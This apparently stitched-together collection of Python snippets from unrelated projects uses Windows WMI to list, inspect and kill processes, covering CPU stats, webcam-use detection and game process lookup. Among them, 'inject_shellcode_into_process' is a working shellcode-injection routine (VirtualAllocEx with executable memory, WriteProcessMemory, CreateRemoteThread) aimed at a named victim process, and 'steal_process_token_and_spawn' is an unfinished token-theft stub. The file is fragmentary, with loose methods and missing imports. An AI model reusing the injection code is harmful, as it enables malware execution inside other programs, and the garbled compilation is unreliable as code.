class ProcessPC:
# se crea el objeto para acceder al Windows Management Instrumentation
def __init__(self):
pythoncom.CoInitialize()
self.wmi = GetObject(r'winmgmts:')
@property
def CPU(self):
#SE GENERA UNA INSTACIA DE WMI
cpu_class = self.wmi.InstancesOf('Win32_Processor')
for cpu in cpu_class:
return {
'Nombre': cpu.Name,
'Nucleos': f'Nucleos: {cpu.NumberOfEnabledCore}',
'Hilos': f'Hilos: {cpu.NumberOfLogicalProcessors}',
'Porcentaje': cpu.LoadPercentage
}
@property
def PROCESS_ACTIVE(self):
process_active_class = self.wmi.InstancesOf('Win32_Process')
list_services = []
listnameservicestemp = []
for process in process_active_class:
if process.Caption not in listnameservicestemp:
listnameservicestemp.append(process.Caption)
list_services.append({
'NAMEPROCESS': process.Caption,
'PID': process.Processid,
})
return list_services
class DetectProcess: #(threading.Thread):
# ----- DATA ----- ###ME'APES DATA
physical_device_object_name = None
process_name = None
process_id = -1
status = ""
# constructor
#def __init__(self):
#threading.Thread.__init__(self)
# the main thread function
def run(self):
try:
print 'Search video device. Please wait..'
self.wmi = GetObject('winmgmts:')
self.get_physical_device_object_name()
# 2 -- Camera connected but not in use 1 -- Camera is on 0 -- Disconnected
if not self.physical_device_object_name: #if device not connected
self.status = '0' #return 0
return
processes = self.wmi.InstancesOf('Win32_Process')
for process in processes: ##for every process:
handlers = self.get_handlers(process.Properties_('Name').Value) ##finds handlers
if handlers.find(self.physical_device_object_name) > -1: ##checks if any are the webcam
self.process_name = process.Properties_('Name').Value ##if do save process name
self.process_id = process.Properties_('ProcessId').Value ##save process id
break
self.status = '1' if self.process_name else '2' ##if the camera is connected but not in a process save status = 2
except Exception as detail:
print 'run-time error : ', detail
def get_handlers( self, processName):##returns handelers for process
return os.popen(HANDLE_EXE_PATH + " -a -p " + processName).read()
def get_physical_device_object_name(self): ##finds physical device name for camera (USB video device)
video_name = None
for serial in self.wmi.InstancesOf("Win32_PnPSignedDriver"):
#print (serial.Name, serial.Description)
if serial.Description and DEVICE_NAME in serial.Description:
video_name = serial.Description
break
if video_name:
self.physical_device_object_name = os.popen("wmic path Win32_PnPSignedDriver where \"devicename like '" + video_name + "'\" get pdo").read()
self.physical_device_object_name = self.physical_device_object_name.split('\r\n')[1]
self.physical_device_object_name = self.physical_device_object_name.strip(' ')
else:
self.physical_device_object_name = None
def getProcessList():
WMI = GetObject('winmgmts:')
processes = WMI.InstancesOf('Win32_Process')
pslist = list()
for process in processes:
pslist.append(process.Properties_('Name').Value)
return pslist
def getProcessesList():
PROCESSES_LIST_ = []
getObj_ = GetObject('winmgmts:')
processes_ = getObj_.InstancesOf('Win32_Process')
for ps_ in processes_:
PROCESSES_LIST_.append(ps_.Properties_('Name').Value)
return PROCESSES_LIST_
def get_winlogon_pid():
WMI = GetObject('winmgmts:')
processes = WMI.InstancesOf('Win32_Process')
for process in processes:
if process.Properties_('name').Value == "winlogon.exe":
winlogon = process.Properties_('processid').Value
return winlogon
def kill_scdaemon():
killed = False
try:
# Works for Windows.
from win32com.client import GetObject
from win32api import OpenProcess, CloseHandle, TerminateProcess
wmi = GetObject("winmgmts:")
ps = wmi.InstancesOf("Win32_Process")
for p in ps:
if p.Properties_("Name").Value == "scdaemon.exe":
pid = p.Properties_("ProcessID").Value
handle = OpenProcess(1, False, pid)
TerminateProcess(handle, -1)
CloseHandle(handle)
killed = True
except ImportError:
# Works for Linux and OS X.
return_code = subprocess.call(["/usr/bin/pkill", "-9",
"scdaemon"]) # nosec
if return_code == 0:
killed = True
if killed:
sleep(0.1)
return killed
def findRunningGpgDecrypts():
""" Find other running gpg-decrypt processes """
result = []
if os.name == "posix":
args = ["ps", "-eo", "pid,comm", "--no-headers"]
ps = subprocess.Popen(args=args,
bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
for line in ps.stdout.readlines():
splitline = line.split()
if len(splitline) > 1 and splitline[1] == "gpg-decrypt":
result.append(int(splitline[0]))
ps.stdin.close()
ps.stdout.close()
ps.stderr.close()
elif os.name == "nt":
from win32com.client import GetObject
WMI = GetObject("winmgmts:")
procs = WMI.InstancesOf('Win32_Process')
for p in procs:
if "gpg-decrypt" in p.Property_('Name').Value:
result.append(int(p.Property_('ProcessID').Value))
return result
def inject_shellcode_into_process(shellcode, victim_process):
pid = 0
WMI = GetObject('winmgmts:')
processes = WMI.InstancesOf('Win32_Process')
for p in processes:
if p.Properties_("Name").Value == victim_process:
pid = p.Properties_("ProcessID").Value
if not pid:
raise Exception(f"Couldn't find {victim_process} in process list")
print(f"[+] Found {victim_process} pid: {pid}")
hSystemProcess = kernel32.OpenProcess(0x1F0FFF, False, pid)
if not hSystemProcess:
raise Exception(
f"Couldn't OpenProcess: {str(kernel32.GetLastError())}")
hShellcode = kernel32.VirtualAllocEx(hSystemProcess, None, len(shellcode),
0x1000 | 0x2000, 0x40)
if not hShellcode:
raise Exception(
f"Couldn't VirtualAllocEx memory: {str(kernel32.GetLastError())}")
success = kernel32.WriteProcessMemory(hSystemProcess, hShellcode,
shellcode, len(shellcode), None)
if not success:
raise Exception(
f"Couldn't WriteProcessMemory: {str(kernel32.GetLastError())}")
success = kernel32.CreateRemoteThread(hSystemProcess, None, 0, hShellcode,
0, 0, None)
if not success:
raise Exception(
f"Couldn't WriteProcessMemory: {str(kernel32.GetLastError())}")
print(
f"[+] Created remote thread in {victim_process} containing shellcode")
def kill_cmd():
WMI = GetObject('winmgmts:')
processes = WMI.InstancesOf('Win32_Process')
for p in WMI.ExecQuery('select * from Win32_Process where Name="cmd.exe"'):
#print ("Killing PID:", p.Properties_('ProcessId').Value)
print(str(p.Properties_('ProcessId').Value))
os.system("taskkill "+str(p.Properties_('ProcessId').Value)+" /f")
def get_process_id(process_name):
WMI = GetObject('winmgmts:')
processes = WMI.InstancesOf('Win32_Process')
pid = WMI.ExecQuery('select * from Win32_Process where Name="' + process_name + '"')
os_app = pywinauto.application.Application()
os_app.connect(process=pid[0].Properties_('ProcessId').Value)
#os_app.DialogWrapper.OK.click()
return pid[0].Properties_('ProcessId').Value
def get_processes_dict(self):
"""
returns a dictionary that contains all the processes PIDs as keys and names as values.
:return: processes dictionary as described above.
"""
try:
# Getting all processes name
z, proc_name = win32pdh.EnumObjectItems(None, None, self.process_obj, win32pdh.PERF_DETAIL_WIZARD)# PERF_DETAIL_WIZARD = 400
instances = {}
for instance in proc_name:
if instance in instances:
instances[instance] += 1
else:
instances[instance] = 1
proc_pid_name = {}
for instance, max_instances in instances.items():
for inum in xrange(max_instances + 1):
try:
hq = win32pdh.OpenQuery() # initializes the query handle
path = win32pdh.MakeCounterPath((None, self.process_obj, instance, None, inum, self.item))
counter_handle = win32pdh.AddCounter(hq, path) # convert counter path to counter handle
win32pdh.CollectQueryData(hq) # collects data for the counter
type, val = win32pdh.GetFormattedCounterValue(counter_handle, win32pdh.PDH_FMT_LONG)
proc_pid_name[val] = [instance]
win32pdh.CloseQuery(hq)
except:
raise OSError("Problem getting process id")
return proc_pid_name
except:
try:
from win32com.client import GetObject
WMI = GetObject('winmgmts:') # COM object
proc_instances = WMI.InstancesOf('Win32_Process') # WMI instanse
proc_name = [process.Properties_('Name').Value for process in
proc_instances] # Get the processess names
proc_id = [process.Properties_('ProcessId').Value for process in
proc_instances] # Get the processess names
proc_pid_name = {}
proc_id_counter = 0
for instance in range(len(proc_name)):
proc_pid_name[proc_id[instance]] = [(proc_name[instance])]
proc_id_counter += 1
return proc_pid_name
except:
raise OSError('Counldnt get the process list')
def getCPUInfo():
"""Sets the total numbers of processors, the number of loaded and free processors on the host
machine or on the different nodes of a cluster.
"""
cpuInfo = None
# Pyro server in cluster mode implemented only for linux platform.
if PLATFORM == 'LINUX':
nProcs = file('/proc/cpuinfo', 'r').read().count('processor\t:')
nLoadedProcs = min(nProcs, int(os.getloadavg()[1] + 0.5))
nFreeProcs = max(0, nProcs - nLoadedProcs)
elif PLATFORM == 'DARWIN':
try:
nProcs = int(
subprocess.Popen(['/usr/sbin/sysctl', '-n', 'hw.ncpu'],
stdout=subprocess.PIPE).stdout.read())
except:
nProcs = 1
nLoadedProcs = min(nProcs, int(os.getloadavg()[1] + 0.5))
nFreeProcs = max(0, nProcs - nLoadedProcs)
hostname = subprocess.Popen(['/bin/hostname'],
stdout=subprocess.PIPE).stdout.read()
elif PLATFORM == 'WINDOWS':
try:
from win32com.client import GetObject
nProcs = 0
loadAvg = 0.0
wmi = GetObject('winmgmts:')
cpu = wmi.InstancesOf('Win32_Processor')
for c in cpu:
nProcs += c.Properties_('NumberOfCores').Value
loadAvg += c.Properties_('LoadPercentage').Value
loadAvg /= nProcs
nLoadedProcs = int(nProcs * loadAvg / 100.0)
nFreeProcs = max(0, nProcs - nLoadedProcs)
except:
LogMessage(
'warning',
'You do not have the priviledge to perform win32 calls.\n\
nMOLDYN can not define the actual number of loaded processors.',
['gui', 'console'])
nProcs = nFreeProcs = int(os.environ['NUMBER_OF_PROCESSORS'])
nLoadedProcs = 0
cpuInfo = (nProcs, nLoadedProcs, nFreeProcs)
return cpuInfo
def process_exists(pid, os="linux"):
if os=="linux":
output, error = biox.utils.cmd("ps -p %s" % pid)
output = output.split("\n")
return len(output)>=3
if os=="windows":
from win32com.client import GetObject
WMI = GetObject('winmgmts:')
processes = WMI.InstancesOf('Win32_Process')
plist = [process.Properties_('ProcessID').Value for process in processes]
return pid in plist
def __init__(self, processName):
self.PID = 0
self.PROCESS = None
wmi = GetObject('winmgmts:')
for p in wmi.InstancesOf('win32_process'):
if p.Name == processName:
self.PID = int(p.Properties_('ProcessId'))
if self.PID == 0:
raise Exception("Couldn't find process \"%s\"" % (processName))
self.PROCESS = win32api.OpenProcess(0x1F0FFF, 0, self.PID)
self.handle = self.PROCESS.handle
def list_current_processes():
"""Returns a list of executable paths to currently active processes.
:return list of active process executable paths
"""
from win32com.client import GetObject
wmi = GetObject('winmgmts:')
processes = wmi.InstancesOf("Win32_Process")
process_list = []
for entry in processes:
executable = entry.Properties_("ExecutablePath").Value
if executable is not None:
process_list.append(
os.path.normpath(executable).replace("\\", "/"))
return sorted(set(process_list))
def killProcess(self, processname):
from win32com.client import GetObject
WMI = GetObject('winmgmts:')
processes = WMI.InstancesOf('Win32_Process')
process_list = [(p.Properties_("ProcessID").Value,
p.Properties_("Name").Value) for p in processes]
for pr in process_list:
if pr[1] == processname:
handle = win32api.OpenProcess(win32con.PROCESS_TERMINATE, 0,
pr[0])
win32api.TerminateProcess(handle, 0)
win32api.CloseHandle(handle)
print "killed %s" % processname
def _set_pid(self):
WMI = GetObject('winmgmts:')
processes = WMI.InstancesOf('Win32_Process')
spelunky_candidates = list(
filter(
lambda x: x[1].lower() == 'spelunky.exe',
map(
lambda p: (p.Properties_('ProcessID').Value,
p.Properties_('Name').Value), processes)))
if len(spelunky_candidates) == 0:
raise RuntimeError('No active Spelunky process found.')
if len(spelunky_candidates) > 1:
raise RuntimeError('More than one active Spelunky process found.')
else:
self.pid = spelunky_candidates[0][0]
def steal_process_token_and_spawn(victim_process, new_process):
print("[-] work in progress method, do not use. Exiting.")
exit(-1)
# TODO, not working. DON'T USE.
pid = 0
WMI = GetObject('winmgmts:')
processes = WMI.InstancesOf('Win32_Process')
for p in processes:
if p.Properties_("Name").Value == victim_process:
pid = p.Properties_("ProcessID").Value
print(f"[+] Found {victim_process} pid: {pid}")
hSystemProcess = win32api.OpenProcess(0x1F0FFF, False, pid)
hToken = win32security.OpenProcessToken(
hSystemProcess, win32con.TOKEN_QUERY | win32con.TOKEN_DUPLICATE)
# fails here when not admin regardless of token privileges of the current process
# even with all Se privs, presumably because the current process' DACL is checked during OpenProcessToken
print(f"[+] Opened handle to {victim_process} token")
print(hToken)
